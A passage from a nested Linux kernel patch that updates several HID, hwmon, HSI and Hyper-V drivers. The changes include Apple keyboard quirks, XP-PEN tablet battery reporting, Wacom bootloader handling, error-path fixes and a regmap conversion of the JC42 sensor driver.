++		.driver_data = APPLE_HAS_FN | APPLE_ISO_TILDE_QUIRK },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_WELLSPRINGT2_J223),
+-		.driver_data = APPLE_HAS_FN },
++		.driver_data = APPLE_HAS_FN | APPLE_ISO_TILDE_QUIRK },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_WELLSPRINGT2_J230K),
+-		.driver_data = APPLE_HAS_FN },
++		.driver_data = APPLE_HAS_FN | APPLE_ISO_TILDE_QUIRK },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_WELLSPRINGT2_J152F),
+-		.driver_data = APPLE_HAS_FN },
++		.driver_data = APPLE_HAS_FN | APPLE_ISO_TILDE_QUIRK },
+ 	{ HID_BLUETOOTH_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_ALU_WIRELESS_2009_ANSI),
+ 		.driver_data = APPLE_NUMLOCK_EMULATION | APPLE_HAS_FN },
+ 	{ HID_BLUETOOTH_DEVICE(USB_VENDOR_ID_APPLE, USB_DEVICE_ID_APPLE_ALU_WIRELESS_2009_ISO),
+diff --git a/drivers/hid/hid-input.c b/drivers/hid/hid-input.c
+index 859aeb07542e3..d728a94c642eb 100644
+--- a/drivers/hid/hid-input.c
++++ b/drivers/hid/hid-input.c
+@@ -340,6 +340,7 @@ static enum power_supply_property hidinput_battery_props[] = {
+ #define HID_BATTERY_QUIRK_PERCENT	(1 << 0) /* always reports percent */
+ #define HID_BATTERY_QUIRK_FEATURE	(1 << 1) /* ask for feature report */
+ #define HID_BATTERY_QUIRK_IGNORE	(1 << 2) /* completely ignore the battery */
++#define HID_BATTERY_QUIRK_AVOID_QUERY	(1 << 3) /* do not query the battery */
+ 
+ static const struct hid_device_id hid_battery_quirks[] = {
+ 	{ HID_BLUETOOTH_DEVICE(USB_VENDOR_ID_APPLE,
+@@ -373,6 +374,8 @@ static const struct hid_device_id hid_battery_quirks[] = {
+ 	  HID_BATTERY_QUIRK_IGNORE },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_ELAN, USB_DEVICE_ID_ASUS_UX550VE_TOUCHSCREEN),
+ 	  HID_BATTERY_QUIRK_IGNORE },
++	{ HID_USB_DEVICE(USB_VENDOR_ID_UGEE, USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_L),
++	  HID_BATTERY_QUIRK_AVOID_QUERY },
+ 	{ HID_I2C_DEVICE(USB_VENDOR_ID_ELAN, I2C_DEVICE_ID_HP_ENVY_X360_15),
+ 	  HID_BATTERY_QUIRK_IGNORE },
+ 	{ HID_I2C_DEVICE(USB_VENDOR_ID_ELAN, I2C_DEVICE_ID_HP_ENVY_X360_15T_DR100),
+@@ -554,6 +557,9 @@ static int hidinput_setup_battery(struct hid_device *dev, unsigned report_type,
+ 	dev->battery_avoid_query = report_type == HID_INPUT_REPORT &&
+ 				   field->physical == HID_DG_STYLUS;
+ 
++	if (quirks & HID_BATTERY_QUIRK_AVOID_QUERY)
++		dev->battery_avoid_query = true;
++
+ 	dev->battery = power_supply_register(&dev->dev, psy_desc, &psy_cfg);
+ 	if (IS_ERR(dev->battery)) {
+ 		error = PTR_ERR(dev->battery);
+diff --git a/drivers/hid/hid-logitech-hidpp.c b/drivers/hid/hid-logitech-hidpp.c
+index 8a2aac18dcc51..656757c79f6b8 100644
+--- a/drivers/hid/hid-logitech-hidpp.c
++++ b/drivers/hid/hid-logitech-hidpp.c
+@@ -2548,12 +2548,17 @@ static int hidpp_ff_init(struct hidpp_device *hidpp,
+ 	struct hid_device *hid = hidpp->hid_dev;
+ 	struct hid_input *hidinput;
+ 	struct input_dev *dev;
+-	const struct usb_device_descriptor *udesc = &(hid_to_usb_dev(hid)->descriptor);
+-	const u16 bcdDevice = le16_to_cpu(udesc->bcdDevice);
++	struct usb_device_descriptor *udesc;
++	u16 bcdDevice;
+ 	struct ff_device *ff;
+ 	int error, j, num_slots = data->num_effects;
+ 	u8 version;
+ 
++	if (!hid_is_usb(hid)) {
++		hid_err(hid, "device is not USB\n");
++		return -ENODEV;
++	}
++
+ 	if (list_empty(&hid->inputs)) {
+ 		hid_err(hid, "no inputs found\n");
+ 		return -ENODEV;
+@@ -2567,6 +2572,8 @@ static int hidpp_ff_init(struct hidpp_device *hidpp,
+ 	}
+ 
+ 	/* Get firmware release */
++	udesc = &(hid_to_usb_dev(hid)->descriptor);
++	bcdDevice = le16_to_cpu(udesc->bcdDevice);
+ 	version = bcdDevice & 255;
+ 
+ 	/* Set supported force feedback capabilities */
+diff --git a/drivers/hid/hid-mcp2221.c b/drivers/hid/hid-mcp2221.c
+index de52e9f7bb8cb..560eeec4035aa 100644
+--- a/drivers/hid/hid-mcp2221.c
++++ b/drivers/hid/hid-mcp2221.c
+@@ -840,12 +840,19 @@ static int mcp2221_probe(struct hid_device *hdev,
+ 		return ret;
+ 	}
+ 
+-	ret = hid_hw_start(hdev, HID_CONNECT_HIDRAW);
++	/*
++	 * This driver uses the .raw_event callback and therefore does not need any
++	 * HID_CONNECT_xxx flags.
++	 */
++	ret = hid_hw_start(hdev, 0);
+ 	if (ret) {
+ 		hid_err(hdev, "can't start hardware\n");
+ 		return ret;
+ 	}
+ 
++	hid_info(hdev, "USB HID v%x.%02x Device [%s] on %s\n", hdev->version >> 8,
++			hdev->version & 0xff, hdev->name, hdev->phys);
++
+ 	ret = hid_hw_open(hdev);
+ 	if (ret) {
+ 		hid_err(hdev, "can't open device\n");
+@@ -870,8 +877,7 @@ static int mcp2221_probe(struct hid_device *hdev,
+ 	mcp->adapter.retries = 1;
+ 	mcp->adapter.dev.parent = &hdev->dev;
+ 	snprintf(mcp->adapter.name, sizeof(mcp->adapter.name),
+-			"MCP2221 usb-i2c bridge on hidraw%d",
+-			((struct hidraw *)hdev->hidraw)->minor);
++			"MCP2221 usb-i2c bridge");
+ 
+ 	ret = i2c_add_adapter(&mcp->adapter);
+ 	if (ret) {
+diff --git a/drivers/hid/hid-rmi.c b/drivers/hid/hid-rmi.c
+index bb1f423f4ace3..84e7ba5314d3f 100644
+--- a/drivers/hid/hid-rmi.c
++++ b/drivers/hid/hid-rmi.c
+@@ -326,6 +326,8 @@ static int rmi_input_event(struct hid_device *hdev, u8 *data, int size)
+ 	if (!(test_bit(RMI_STARTED, &hdata->flags)))
+ 		return 0;
+ 
++	pm_wakeup_event(hdev->dev.parent, 0);
++
+ 	local_irq_save(flags);
+ 
+ 	rmi_set_attn_data(rmi_dev, data[1], &data[2], size - 2);
+diff --git a/drivers/hid/hid-sensor-custom.c b/drivers/hid/hid-sensor-custom.c
+index 32c2306e240d6..602465ad27458 100644
+--- a/drivers/hid/hid-sensor-custom.c
++++ b/drivers/hid/hid-sensor-custom.c
+@@ -62,7 +62,7 @@ struct hid_sensor_sample {
+ 	u32 raw_len;
+ } __packed;
+ 
+-static struct attribute hid_custom_attrs[] = {
++static struct attribute hid_custom_attrs[HID_CUSTOM_TOTAL_ATTRS] = {
+ 	{.name = "name", .mode = S_IRUGO},
+ 	{.name = "units", .mode = S_IRUGO},
+ 	{.name = "unit-expo", .mode = S_IRUGO},
+diff --git a/drivers/hid/hid-uclogic-params.c b/drivers/hid/hid-uclogic-params.c
+index 34fa991e6267e..cd1233d7e2535 100644
+--- a/drivers/hid/hid-uclogic-params.c
++++ b/drivers/hid/hid-uclogic-params.c
+@@ -18,6 +18,7 @@
+ #include "usbhid/usbhid.h"
+ #include "hid-ids.h"
+ #include <linux/ctype.h>
++#include <linux/string.h>
+ #include <asm/unaligned.h>
+ 
+ /**
+@@ -1211,6 +1212,69 @@ static int uclogic_params_ugee_v2_init_frame_mouse(struct uclogic_params *p)
+ 	return rc;
+ }
+ 
++/**
++ * uclogic_params_ugee_v2_has_battery() - check whether a UGEE v2 device has
++ * battery or not.
++ * @hdev:	The HID device of the tablet interface.
++ *
++ * Returns:
++ *	True if the device has battery, false otherwise.
++ */
++static bool uclogic_params_ugee_v2_has_battery(struct hid_device *hdev)
++{
++	/* The XP-PEN Deco LW vendor, product and version are identical to the
++	 * Deco L. The only difference reported by their firmware is the product
++	 * name. Add a quirk to support battery reporting on the wireless
++	 * version.
++	 */
++	if (hdev->vendor == USB_VENDOR_ID_UGEE &&
++	    hdev->product == USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_L) {
++		struct usb_device *udev = hid_to_usb_dev(hdev);
++
++		if (strstarts(udev->product, "Deco LW"))
++			return true;
++	}
++
++	return false;
++}
++
++/**
++ * uclogic_params_ugee_v2_init_battery() - initialize UGEE v2 battery reporting.
++ * @hdev:	The HID device of the tablet interface, cannot be NULL.
++ * @p:		Parameters to fill in, cannot be NULL.
++ *
++ * Returns:
++ *	Zero, if successful. A negative errno code on error.
++ */
++static int uclogic_params_ugee_v2_init_battery(struct hid_device *hdev,
++					       struct uclogic_params *p)
++{
++	int rc = 0;
++
++	if (!hdev || !p)
++		return -EINVAL;
++
++	/* Some tablets contain invalid characters in hdev->uniq, throwing a
++	 * "hwmon: '<name>' is not a valid name attribute, please fix" error.
++	 * Use the device vendor and product IDs instead.
++	 */
++	snprintf(hdev->uniq, sizeof(hdev->uniq), "%x-%x", hdev->vendor,
++		 hdev->product);
++
++	rc = uclogic_params_frame_init_with_desc(&p->frame_list[1],
++						 uclogic_rdesc_ugee_v2_battery_template_arr,
++						 uclogic_rdesc_ugee_v2_battery_template_size,
++						 UCLOGIC_RDESC_UGEE_V2_BATTERY_ID);
++	if (rc)
++		return rc;
++
++	p->frame_list[1].suffix = "Battery";
++	p->pen.subreport_list[1].value = 0xf2;
++	p->pen.subreport_list[1].id = UCLOGIC_RDESC_UGEE_V2_BATTERY_ID;
++
++	return rc;
++}
++
+ /**
+  * uclogic_params_ugee_v2_init() - initialize a UGEE graphics tablets by
+  * discovering their parameters.
+@@ -1334,6 +1398,15 @@ static int uclogic_params_ugee_v2_init(struct uclogic_params *params,
+ 	if (rc)
+ 		goto cleanup;
+ 
++	/* Initialize the battery interface*/
++	if (uclogic_params_ugee_v2_has_battery(hdev)) {
++		rc = uclogic_params_ugee_v2_init_battery(hdev, &p);
++		if (rc) {
++			hid_err(hdev, "error initializing battery: %d\n", rc);
++			goto cleanup;
++		}
++	}
++
+ output:
+ 	/* Output parameters */
+ 	memcpy(params, &p, sizeof(*params));
+diff --git a/drivers/hid/hid-uclogic-rdesc.c b/drivers/hid/hid-uclogic-rdesc.c
+index 6b73eb0df6bd7..fb40775f5f5b3 100644
+--- a/drivers/hid/hid-uclogic-rdesc.c
++++ b/drivers/hid/hid-uclogic-rdesc.c
+@@ -1035,6 +1035,40 @@ const __u8 uclogic_rdesc_ugee_v2_frame_mouse_template_arr[] = {
+ const size_t uclogic_rdesc_ugee_v2_frame_mouse_template_size =
+ 			sizeof(uclogic_rdesc_ugee_v2_frame_mouse_template_arr);
+ 
++/* Fixed report descriptor template for UGEE v2 battery reports */
++const __u8 uclogic_rdesc_ugee_v2_battery_template_arr[] = {
++	0x05, 0x01,         /*  Usage Page (Desktop),                   */
++	0x09, 0x07,         /*  Usage (Keypad),                         */
++	0xA1, 0x01,         /*  Collection (Application),               */
++	0x85, UCLOGIC_RDESC_UGEE_V2_BATTERY_ID,
++			    /*      Report ID,                          */
++	0x75, 0x08,         /*      Report Size (8),                    */
++	0x95, 0x02,         /*      Report Count (2),                   */
++	0x81, 0x01,         /*      Input (Constant),                   */
++	0x05, 0x84,         /*      Usage Page (Power Device),          */
++	0x05, 0x85,         /*      Usage Page (Battery System),        */
++	0x09, 0x65,         /*      Usage Page (AbsoluteStateOfCharge), */
++	0x75, 0x08,         /*      Report Size (8),                    */
++	0x95, 0x01,         /*      Report Count (1),                   */
++	0x15, 0x00,         /*      Logical Minimum (0),                */
++	0x26, 0xff, 0x00,   /*      Logical Maximum (255),              */
++	0x81, 0x02,         /*      Input (Variable),                   */
++	0x75, 0x01,         /*      Report Size (1),                    */
++	0x95, 0x01,         /*      Report Count (1),                   */
++	0x15, 0x00,         /*      Logical Minimum (0),                */
++	0x25, 0x01,         /*      Logical Maximum (1),                */
++	0x09, 0x44,         /*      Usage Page (Charging),              */
++	0x81, 0x02,         /*      Input (Variable),                   */
++	0x95, 0x07,         /*      Report Count (7),                   */
++	0x81, 0x01,         /*      Input (Constant),                   */
++	0x75, 0x08,         /*      Report Size (8),                    */
++	0x95, 0x07,         /*      Report Count (7),                   */
++	0x81, 0x01,         /*      Input (Constant),                   */
++	0xC0                /*  End Collection                          */
++};
++const size_t uclogic_rdesc_ugee_v2_battery_template_size =
++			sizeof(uclogic_rdesc_ugee_v2_battery_template_arr);
++
+ /* Fixed report descriptor for Ugee EX07 frame */
+ const __u8 uclogic_rdesc_ugee_ex07_frame_arr[] = {
+ 	0x05, 0x01,             /*  Usage Page (Desktop),                   */
+diff --git a/drivers/hid/hid-uclogic-rdesc.h b/drivers/hid/hid-uclogic-rdesc.h
+index 0502a06564964..a1f78c07293ff 100644
+--- a/drivers/hid/hid-uclogic-rdesc.h
++++ b/drivers/hid/hid-uclogic-rdesc.h
+@@ -161,6 +161,9 @@ extern const size_t uclogic_rdesc_v2_frame_dial_size;
+ /* Device ID byte offset in v2 frame dial reports */
+ #define UCLOGIC_RDESC_V2_FRAME_DIAL_DEV_ID_BYTE	0x4
+ 
++/* Report ID for tweaked UGEE v2 battery reports */
++#define UCLOGIC_RDESC_UGEE_V2_BATTERY_ID 0xba
++
+ /* Fixed report descriptor template for UGEE v2 pen reports */
+ extern const __u8 uclogic_rdesc_ugee_v2_pen_template_arr[];
+ extern const size_t uclogic_rdesc_ugee_v2_pen_template_size;
+@@ -177,6 +180,10 @@ extern const size_t uclogic_rdesc_ugee_v2_frame_dial_template_size;
+ extern const __u8 uclogic_rdesc_ugee_v2_frame_mouse_template_arr[];
+ extern const size_t uclogic_rdesc_ugee_v2_frame_mouse_template_size;
+ 
++/* Fixed report descriptor template for UGEE v2 battery reports */
++extern const __u8 uclogic_rdesc_ugee_v2_battery_template_arr[];
++extern const size_t uclogic_rdesc_ugee_v2_battery_template_size;
++
+ /* Fixed report descriptor for Ugee EX07 frame */
+ extern const __u8 uclogic_rdesc_ugee_ex07_frame_arr[];
+ extern const size_t uclogic_rdesc_ugee_ex07_frame_size;
+diff --git a/drivers/hid/i2c-hid/i2c-hid-core.c b/drivers/hid/i2c-hid/i2c-hid-core.c
+index 0667b6022c3b7..a9428b7f34a46 100644
+--- a/drivers/hid/i2c-hid/i2c-hid-core.c
++++ b/drivers/hid/i2c-hid/i2c-hid-core.c
+@@ -554,7 +554,8 @@ static void i2c_hid_get_input(struct i2c_hid *ihid)
+ 	i2c_hid_dbg(ihid, "input: %*ph\n", ret_size, ihid->inbuf);
+ 
+ 	if (test_bit(I2C_HID_STARTED, &ihid->flags)) {
+-		pm_wakeup_event(&ihid->client->dev, 0);
++		if (ihid->hid->group != HID_GROUP_RMI)
++			pm_wakeup_event(&ihid->client->dev, 0);
+ 
+ 		hid_input_report(ihid->hid, HID_INPUT_REPORT,
+ 				ihid->inbuf + sizeof(__le16),
+diff --git a/drivers/hid/wacom_sys.c b/drivers/hid/wacom_sys.c
+index 634263e4556b0..fb538a6c4add8 100644
+--- a/drivers/hid/wacom_sys.c
++++ b/drivers/hid/wacom_sys.c
+@@ -155,6 +155,9 @@ static int wacom_raw_event(struct hid_device *hdev, struct hid_report *report,
+ {
+ 	struct wacom *wacom = hid_get_drvdata(hdev);
+ 
++	if (wacom->wacom_wac.features.type == BOOTLOADER)
++		return 0;
++
+ 	if (size > WACOM_PKGLEN_MAX)
+ 		return 1;
+ 
+@@ -2785,6 +2788,11 @@ static int wacom_probe(struct hid_device *hdev,
+ 		return error;
+ 	}
+ 
++	if (features->type == BOOTLOADER) {
++		hid_warn(hdev, "Using device in hidraw-only mode");
++		return hid_hw_start(hdev, HID_CONNECT_HIDRAW);
++	}
++
+ 	error = wacom_parse_and_register(wacom, false);
+ 	if (error)
+ 		return error;
+diff --git a/drivers/hid/wacom_wac.c b/drivers/hid/wacom_wac.c
+index 0f3d57b426846..9312d611db8e5 100644
+--- a/drivers/hid/wacom_wac.c
++++ b/drivers/hid/wacom_wac.c
+@@ -4882,6 +4882,9 @@ static const struct wacom_features wacom_features_0x3dd =
+ static const struct wacom_features wacom_features_HID_ANY_ID =
+ 	{ "Wacom HID", .type = HID_GENERIC, .oVid = HID_ANY_ID, .oPid = HID_ANY_ID };
+ 
++static const struct wacom_features wacom_features_0x94 =
++	{ "Wacom Bootloader", .type = BOOTLOADER };
++
+ #define USB_DEVICE_WACOM(prod)						\
+ 	HID_DEVICE(BUS_USB, HID_GROUP_WACOM, USB_VENDOR_ID_WACOM, prod),\
+ 	.driver_data = (kernel_ulong_t)&wacom_features_##prod
+@@ -4955,6 +4958,7 @@ const struct hid_device_id wacom_ids[] = {
+ 	{ USB_DEVICE_WACOM(0x84) },
+ 	{ USB_DEVICE_WACOM(0x90) },
+ 	{ USB_DEVICE_WACOM(0x93) },
++	{ USB_DEVICE_WACOM(0x94) },
+ 	{ USB_DEVICE_WACOM(0x97) },
+ 	{ USB_DEVICE_WACOM(0x9A) },
+ 	{ USB_DEVICE_WACOM(0x9F) },
+diff --git a/drivers/hid/wacom_wac.h b/drivers/hid/wacom_wac.h
+index 5ca6c06d143be..16f221388563d 100644
+--- a/drivers/hid/wacom_wac.h
++++ b/drivers/hid/wacom_wac.h
+@@ -243,6 +243,7 @@ enum {
+ 	MTTPC,
+ 	MTTPC_B,
+ 	HID_GENERIC,
++	BOOTLOADER,
+ 	MAX_TYPE
+ };
+ 
+diff --git a/drivers/hsi/controllers/omap_ssi_core.c b/drivers/hsi/controllers/omap_ssi_core.c
+index eb98201583185..26f2c3c012978 100644
+--- a/drivers/hsi/controllers/omap_ssi_core.c
++++ b/drivers/hsi/controllers/omap_ssi_core.c
+@@ -502,8 +502,10 @@ static int ssi_probe(struct platform_device *pd)
+ 	platform_set_drvdata(pd, ssi);
+ 
+ 	err = ssi_add_controller(ssi, pd);
+-	if (err < 0)
++	if (err < 0) {
++		hsi_put_controller(ssi);
+ 		goto out1;
++	}
+ 
+ 	pm_runtime_enable(&pd->dev);
+ 
+@@ -536,9 +538,9 @@ out3:
+ 	device_for_each_child(&pd->dev, NULL, ssi_remove_ports);
+ out2:
+ 	ssi_remove_controller(ssi);
++	pm_runtime_disable(&pd->dev);
+ out1:
+ 	platform_set_drvdata(pd, NULL);
+-	pm_runtime_disable(&pd->dev);
+ 
+ 	return err;
+ }
+@@ -629,7 +631,13 @@ static int __init ssi_init(void) {
+ 	if (ret)
+ 		return ret;
+ 
+-	return platform_driver_register(&ssi_port_pdriver);
++	ret = platform_driver_register(&ssi_port_pdriver);
++	if (ret) {
++		platform_driver_unregister(&ssi_pdriver);
++		return ret;
++	}
++
++	return 0;
+ }
+ module_init(ssi_init);
+ 
+diff --git a/drivers/hv/ring_buffer.c b/drivers/hv/ring_buffer.c
+index 59a4aa86d1f35..c6692fd5ab155 100644
+--- a/drivers/hv/ring_buffer.c
++++ b/drivers/hv/ring_buffer.c
+@@ -280,6 +280,19 @@ void hv_ringbuffer_cleanup(struct hv_ring_buffer_info *ring_info)
+ 	ring_info->pkt_buffer_size = 0;
+ }
+ 
++/*
++ * Check if the ring buffer spinlock is available to take or not; used on
++ * atomic contexts, like panic path (see the Hyper-V framebuffer driver).
++ */
++
++bool hv_ringbuffer_spinlock_busy(struct vmbus_channel *channel)
++{
++	struct hv_ring_buffer_info *rinfo = &channel->outbound;
++
++	return spin_is_locked(&rinfo->ring_lock);
++}
++EXPORT_SYMBOL_GPL(hv_ringbuffer_spinlock_busy);
++
+ /* Write to the ring buffer. */
+ int hv_ringbuffer_write(struct vmbus_channel *channel,
+ 			const struct kvec *kv_list, u32 kv_count,
+diff --git a/drivers/hwmon/Kconfig b/drivers/hwmon/Kconfig
+index 7ac3daaf59ce0..d3bccc8176c51 100644
+--- a/drivers/hwmon/Kconfig
++++ b/drivers/hwmon/Kconfig
+@@ -799,6 +799,7 @@ config SENSORS_IT87
+ config SENSORS_JC42
+ 	tristate "JEDEC JC42.4 compliant memory module temperature sensors"
+ 	depends on I2C
++	select REGMAP_I2C
+ 	help
+ 	  If you say yes here, you get support for JEDEC JC42.4 compliant
+ 	  temperature sensors, which are used on many DDR3 memory modules for
+diff --git a/drivers/hwmon/emc2305.c b/drivers/hwmon/emc2305.c
+index aa1f25add0b6b..e42ae43f3de46 100644
+--- a/drivers/hwmon/emc2305.c
++++ b/drivers/hwmon/emc2305.c
+@@ -16,7 +16,6 @@ static const unsigned short
+ emc2305_normal_i2c[] = { 0x27, 0x2c, 0x2d, 0x2e, 0x2f, 0x4c, 0x4d, I2C_CLIENT_END };
+ 
+ #define EMC2305_REG_DRIVE_FAIL_STATUS	0x27
+-#define EMC2305_REG_DEVICE		0xfd
+ #define EMC2305_REG_VENDOR		0xfe
+ #define EMC2305_FAN_MAX			0xff
+ #define EMC2305_FAN_MIN			0x00
+@@ -172,22 +171,12 @@ static int emc2305_get_max_state(struct thermal_cooling_device *cdev, unsigned l
+ 	return 0;
+ }
+ 
+-static int emc2305_set_cur_state(struct thermal_cooling_device *cdev, unsigned long state)
++static int __emc2305_set_cur_state(struct emc2305_data *data, int cdev_idx, unsigned long state)
+ {
+-	int cdev_idx, ret;
+-	struct emc2305_data *data = cdev->devdata;
++	int ret;
+ 	struct i2c_client *client = data->client;
+ 	u8 val, i;
+ 
+-	if (state > data->max_state)
+-		return -EINVAL;
+-
+-	cdev_idx =  emc2305_get_cdev_idx(cdev);
+-	if (cdev_idx < 0)
+-		return cdev_idx;
+-
+-	/* Save thermal state. */
+-	data->cdev_data[cdev_idx].last_thermal_state = state;
+ 	state = max_t(unsigned long, state, data->cdev_data[cdev_idx].last_hwmon_state);
+ 
+ 	val = EMC2305_PWM_STATE2DUTY(state, data->max_state, EMC2305_FAN_MAX);
+@@ -212,6 +201,27 @@ static int emc2305_set_cur_state(struct thermal_cooling_device *cdev, unsigned l
+ 	return 0;
+ }
+ 
++static int emc2305_set_cur_state(struct thermal_cooling_device *cdev, unsigned long state)
++{
++	int cdev_idx, ret;
++	struct emc2305_data *data = cdev->devdata;
++
++	if (state > data->max_state)
++		return -EINVAL;
++
++	cdev_idx =  emc2305_get_cdev_idx(cdev);
++	if (cdev_idx < 0)
++		return cdev_idx;
++
++	/* Save thermal state. */
++	data->cdev_data[cdev_idx].last_thermal_state = state;
++	ret = __emc2305_set_cur_state(data, cdev_idx, state);
++	if (ret < 0)
++		return ret;
++
++	return 0;
++}
++
+ static const struct thermal_cooling_device_ops emc2305_cooling_ops = {
+ 	.get_max_state = emc2305_get_max_state,
+ 	.get_cur_state = emc2305_get_cur_state,
+@@ -402,7 +412,7 @@ emc2305_write(struct device *dev, enum hwmon_sensor_types type, u32 attr, int ch
+ 				 */
+ 				if (data->cdev_data[cdev_idx].last_hwmon_state >=
+ 				    data->cdev_data[cdev_idx].last_thermal_state)
+-					return emc2305_set_cur_state(data->cdev_data[cdev_idx].cdev,
++					return __emc2305_set_cur_state(data, cdev_idx,
+ 							data->cdev_data[cdev_idx].last_hwmon_state);
+ 				return 0;
+ 			}
+@@ -524,7 +534,7 @@ static int emc2305_probe(struct i2c_client *client, const struct i2c_device_id *
+ 	struct device *dev = &client->dev;
+ 	struct emc2305_data *data;
+ 	struct emc2305_platform_data *pdata;
+-	int vendor, device;
++	int vendor;
+ 	int ret;
+ 	int i;
+ 
+@@ -535,10 +545,6 @@ static int emc2305_probe(struct i2c_client *client, const struct i2c_device_id *
+ 	if (vendor != EMC2305_VENDOR)
+ 		return -ENODEV;
+ 
+-	device = i2c_smbus_read_byte_data(client, EMC2305_REG_DEVICE);
+-	if (device != EMC2305_DEVICE)
+-		return -ENODEV;
+-
+ 	data = devm_kzalloc(dev, sizeof(*data), GFP_KERNEL);
+ 	if (!data)
+ 		return -ENOMEM;
+diff --git a/drivers/hwmon/jc42.c b/drivers/hwmon/jc42.c
+index 30888feaf589b..6593d81cb901b 100644
+--- a/drivers/hwmon/jc42.c
++++ b/drivers/hwmon/jc42.c
+@@ -19,6 +19,7 @@
+ #include <linux/err.h>
+ #include <linux/mutex.h>
+ #include <linux/of.h>
++#include <linux/regmap.h>
+ 
+ /* Addresses to scan */
+ static const unsigned short normal_i2c[] = {
+@@ -199,31 +200,14 @@ static struct jc42_chips jc42_chips[] = {
+ 	{ STM_MANID, STTS3000_DEVID, STTS3000_DEVID_MASK },
+ };
+ 
+-enum temp_index {
+-	t_input = 0,
+-	t_crit,
+-	t_min,
+-	t_max,
+-	t_num_temp
+-};
+-
+-static const u8 temp_regs[t_num_temp] = {
+-	[t_input] = JC42_REG_TEMP,
+-	[t_crit] = JC42_REG_TEMP_CRITICAL,
+-	[t_min] = JC42_REG_TEMP_LOWER,
+-	[t_max] = JC42_REG_TEMP_UPPER,
+-};
+-
+ /* Each client has this additional data */
+ struct jc42_data {
+-	struct i2c_client *client;
+ 	struct mutex	update_lock;	/* protect register access */
++	struct regmap	*regmap;
+ 	bool		extended;	/* true if extended range supported */
+ 	bool		valid;
+-	unsigned long	last_updated;	/* In jiffies */
+ 	u16		orig_config;	/* original configuration */
+ 	u16		config;		/* current configuration */
+-	u16		temp[t_num_temp];/* Temperatures */
+ };
+ 
+ #define JC42_TEMP_MIN_EXTENDED	(-40000)
+@@ -248,85 +232,102 @@ static int jc42_temp_from_reg(s16 reg)
+ 	return reg * 125 / 2;
+ }
+ 
+-static struct jc42_data *jc42_update_device(struct device *dev)
+-{
+-	struct jc42_data *data = dev_get_drvdata(dev);
+-	struct i2c_client *client = data->client;
+-	struct jc42_data *ret = data;
+-	int i, val;
+-
+-	mutex_lock(&data->update_lock);
+-
+-	if (time_after(jiffies, data->last_updated + HZ) || !data->valid) {
+-		for (i = 0; i < t_num_temp; i++) {
+-			val = i2c_smbus_read_word_swapped(client, temp_regs[i]);
+-			if (val < 0) {
+-				ret = ERR_PTR(val);
+-				goto abort;
+-			}
+-			data->temp[i] = val;
+-		}
+-		data->last_updated = jiffies;
+-		data->valid = true;
+-	}
+-abort:
+-	mutex_unlock(&data->update_lock);
+-	return ret;
+-}
+-
+ static int jc42_read(struct device *dev, enum hwmon_sensor_types type,
+ 		     u32 attr, int channel, long *val)
+ {
+-	struct jc42_data *data = jc42_update_device(dev);
+-	int temp, hyst;
++	struct jc42_data *data = dev_get_drvdata(dev);
++	unsigned int regval;
++	int ret, temp, hyst;
+ 
+-	if (IS_ERR(data))
+-		return PTR_ERR(data);
++	mutex_lock(&data->update_lock);
+ 
+ 	switch (attr) {
+ 	case hwmon_temp_input:
+-		*val = jc42_temp_from_reg(data->temp[t_input]);
+-		return 0;
++		ret = regmap_read(data->regmap, JC42_REG_TEMP, &regval);
++		if (ret)
++			break;
++
++		*val = jc42_temp_from_reg(regval);
++		break;
+ 	case hwmon_temp_min:
+-		*val = jc42_temp_from_reg(data->temp[t_min]);
+-		return 0;
++		ret = regmap_read(data->regmap, JC42_REG_TEMP_LOWER, &regval);
++		if (ret)
++			break;
++
++		*val = jc42_temp_from_reg(regval);
++		break;
+ 	case hwmon_temp_max:
+-		*val = jc42_temp_from_reg(data->temp[t_max]);
+-		return 0;
++		ret = regmap_read(data->regmap, JC42_REG_TEMP_UPPER, &regval);
++		if (ret)
++			break;
++
++		*val = jc42_temp_from_reg(regval);
++		break;
+ 	case hwmon_temp_crit:
+-		*val = jc42_temp_from_reg(data->temp[t_crit]);
+-		return 0;
++		ret = regmap_read(data->regmap, JC42_REG_TEMP_CRITICAL,
++				  &regval);
++		if (ret)
++			break;
++
++		*val = jc42_temp_from_reg(regval);
++		break;
+ 	case hwmon_temp_max_hyst:
+-		temp = jc42_temp_from_reg(data->temp[t_max]);
++		ret = regmap_read(data->regmap, JC42_REG_TEMP_UPPER, &regval);
++		if (ret)
++			break;
++
++		temp = jc42_temp_from_reg(regval);
+ 		hyst = jc42_hysteresis[(data->config & JC42_CFG_HYST_MASK)
+ 						>> JC42_CFG_HYST_SHIFT];
+ 		*val = temp - hyst;
+-		return 0;
++		break;
+ 	case hwmon_temp_crit_hyst:
+-		temp = jc42_temp_from_reg(data->temp[t_crit]);
++		ret = regmap_read(data->regmap, JC42_REG_TEMP_CRITICAL,
++				  &regval);
++		if (ret)
++			break;
++
++		temp = jc42_temp_from_reg(regval);
+ 		hyst = jc42_hysteresis[(data->config & JC42_CFG_HYST_MASK)
+ 						>> JC42_CFG_HYST_SHIFT];
+ 		*val = temp - hyst;
+-		return 0;
++		break;
+ 	case hwmon_temp_min_alarm:
+-		*val = (data->temp[t_input] >> JC42_ALARM_MIN_BIT) & 1;
+-		return 0;
++		ret = regmap_read(data->regmap, JC42_REG_TEMP, &regval);
++		if (ret)
++			break;
++
++		*val = (regval >> JC42_ALARM_MIN_BIT) & 1;
++		break;
+ 	case hwmon_temp_max_alarm:
+-		*val = (data->temp[t_input] >> JC42_ALARM_MAX_BIT) & 1;
+-		return 0;
++		ret = regmap_read(data->regmap, JC42_REG_TEMP, &regval);
++		if (ret)
++			break;
++
++		*val = (regval >> JC42_ALARM_MAX_BIT) & 1;
++		break;
+ 	case hwmon_temp_crit_alarm:
+-		*val = (data->temp[t_input] >> JC42_ALARM_CRIT_BIT) & 1;
+-		return 0;
++		ret = regmap_read(data->regmap, JC42_REG_TEMP, &regval);
++		if (ret)
++			break;
++
++		*val = (regval >> JC42_ALARM_CRIT_BIT) & 1;
++		break;
+ 	default:
+-		return -EOPNOTSUPP;
++		ret = -EOPNOTSUPP;
++		break;
+ 	}
++
++	mutex_unlock(&data->update_lock);
++
++	return ret;
+ }
+ 
